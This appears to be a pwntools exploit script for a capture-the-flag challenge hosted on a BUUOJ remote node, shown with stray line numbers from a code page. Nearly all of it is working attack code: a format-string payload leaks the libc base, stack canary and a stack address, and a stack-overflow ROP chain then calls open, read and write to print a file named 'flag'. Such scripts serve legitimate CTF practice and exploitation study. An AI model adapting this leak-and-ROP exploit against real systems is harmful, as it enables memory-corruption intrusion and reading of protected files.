1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63
| from pwn import * import sys context.log_level='debug' context.arch='amd64'
flag=1 if flag: sh = remote('node4.buuoj.cn', 29107) else: sh = process("./pwn")
libc=ELF('/home/wendy/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6',checksec=False) elf=ELF('./pwn') sa = lambda s,n : sh.sendafter(s,n) sla = lambda s,n : sh.sendlineafter(s,n) sl = lambda s : sh.sendline(s) sd = lambda s : sh.send(s) rc = lambda n : sh.recv(n) ru = lambda s : sh.recvuntil(s) ti = lambda : sh.interactive() leak = lambda name,addr :log.success(name+":"+hex(addr))
pay='%25$p.%27$p.%28$p' pay=pay.ljust(0x20,'\x00') pay+='flag\x00\x00\x00\x00' sla('What is your name?',pay)
ru('0x') libc_base = int(sh.recvuntil('.',drop=True),16) - 0x6ffc4 leak('libc_base',libc_base) libc.address=libc_base ru('0x') canary = int(sh.recvuntil('.',drop=True),16) leak('canary',canary)
ru('0x') stack_addr = int(sh.recvuntil('\n',drop=True),16) flag=stack_addr -0xe0 leak('flag',flag)
pop_rdi=0x0000000000400943 pop_rsi=0x00000000000202f8+libc_base pop_rdx=0x0000000000001b92+libc_base
orw_rop='a'*(0x70-8)+p64(canary)+p64(0) orw_rop+=p64(pop_rdi)+p64(flag) orw_rop+=p64(pop_rsi)+p64(0) orw_rop+=p64(libc.sym['open']) orw_rop+=p64(pop_rdi)+p64(3) orw_rop+=p64(pop_rsi)+p64(flag) orw_rop+=p64(pop_rdx)+p64(0x50) orw_rop+=p64(libc.sym['read']) orw_rop+=p64(pop_rdi)+p64(1) orw_rop+=p64(pop_rsi)+p64(flag) orw_rop+=p64(pop_rdx)+p64(0x50) orw_rop+=p64(libc.sym['write'])
sla('What can we help you?',orw_rop)
ti()
|